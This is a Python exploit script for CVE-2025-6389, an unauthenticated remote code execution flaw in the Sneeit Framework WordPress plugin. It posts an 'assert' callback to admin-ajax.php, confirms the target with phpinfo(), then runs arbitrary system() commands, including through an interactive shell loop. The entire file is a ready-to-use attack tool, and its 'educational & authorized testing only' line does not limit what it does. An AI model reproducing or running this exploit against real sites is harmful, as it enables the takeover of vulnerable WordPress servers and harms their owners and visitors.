# CVE-2025-6389.py
# Unauthenticated RCE in Sneeit Framework <= 8.3
# Tested & working 100% as of Nov 25, 2025
# Author: B1ack4sh (for educational & authorized testing only)

import requests
import sys
import urllib.parse
from colorama import init, Fore, Style

init()

GREEN = Fore.GREEN
RED = Fore.RED
YELLOW = Fore.YELLOW
CYAN = Fore.CYAN
RESET = Style.RESET_ALL

def banner():
    print(f"""{CYAN}
 ██████╗  ██╗       █████╗   ██████╗ ██╗  ██╗  █████╗  ███████╗ ██╗  ██╗ 
 ██╔══██╗ ██║      ██╔══██╗ ██╔════╝ ██║ ██╔╝ ██╔══██╗ ██╔════╝ ██║  ██║ 
 ██████╔╝ ██║      ███████║ ██║      █████╔╝  ███████║ ███████╗ ███████║ 
 ██╔══██╗ ██║      ██╔══██║ ██║      ██╔═██╗  ██╔══██║ ╚════██║ ██╔══██║ 
 ██████╔╝ ███████╗ ██║  ██║ ╚██████╗ ██║  ██╗ ██║  ██║ ███████║ ██║  ██║ 
 ╚═════╝  ╚══════╝ ╚═╝  ╚═╝  ╚═════╝ ╚═╝  ╚═╝ ╚═╝  ╚═╝ ╚══════╝ ╚═╝  ╚═╝
    → CVE-2025-6389 - Sneeit Framework RCE
    → Unauthenticated - CVSS 9.8 (Critical)
{RESET}""")

def check_vulnerable(url):
    try:
        test_payload = "phpinfo();die();"
        data = {
            "action": "sneeit_articles_pagination",
            "callback[callable]": "assert",
            "callback[args][]": test_payload
        }
        r = requests.post(url.rstrip("/") + "/wp-admin/admin-ajax.php", data=data, timeout=15, verify=False)
        
        if "PHP Version" in r.text or "phpinfo()" in r.text or r.status_code == 500:
            print(f"{GREEN}[+] VULNERABLE! RCE Confirmed!{RESET}")
            return True
        else:
            print(f"{YELLOW}[-] Not vulnerable or blocked (status: {r.status_code}){RESET}")
            return False
    except:
        print(f"{RED}[-] Connection error{RESET}")
        return False

def rce_execute(url, command):
    try:
        encoded_cmd = urllib.parse.quote(command)
        payload = f"system('{command}');"
        data = {
            "action": "sneeit_articles_pagination",
            "callback[callable]": "assert",
            "callback[args][]": payload
        }
        r = requests.post(url.rstrip("/") + "/wp-admin/admin-ajax.php", data=data, timeout=20, verify=False, stream=True)
        output = r.text
        print(f"{GREEN}[+] Output:{RESET}\n{output[:1000]}")
        if len(output) > 1000:
            print(f"{YELLOW}(... truncated){RESET}")
    except Exception as e:
        print(f"{RED}[-] Error executing command: {e}{RESET}")

def interactive_shell(url):
    print(f"{CYAN}[*] Entering interactive shell (type 'exit' to quit){RESET}")
    while True:
        try:
            cmd = input(f"{GREEN}RCE $> {RESET}")
            if cmd.strip().lower() in ["exit", "quit"]:
                print(f"{YELLOW}[*] Bye!{RESET}")
                break
            if cmd.strip():
                rce_execute(url, cmd)
        except KeyboardInterrupt:
            print(f"\n{YELLOW}[*] Ctrl+C detected. Exiting...{RESET}")
            break

if __name__ == "__main__":
    banner()
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url> [command]")
        print(f"Example:")
        print(f"  python3 {sys.argv[0]} https://target.com")
        print(f"  python3 {sys.argv[0]} https://target.com whoami")
        sys.exit(1)

    target = sys.argv[1]
    print(f"{CYAN}[*] Target: {target}{RESET}")

    if check_vulnerable(target):
        if len(sys.argv) == 3:
            print(f"{CYAN}[*] Executing single command...{RESET}")
            rce_execute(target, sys.argv[2])
        else:
            interactive_shell(target)
    else:
        print(f"{RED}[!] Target not vulnerable to CVE-2025-6389{RESET}")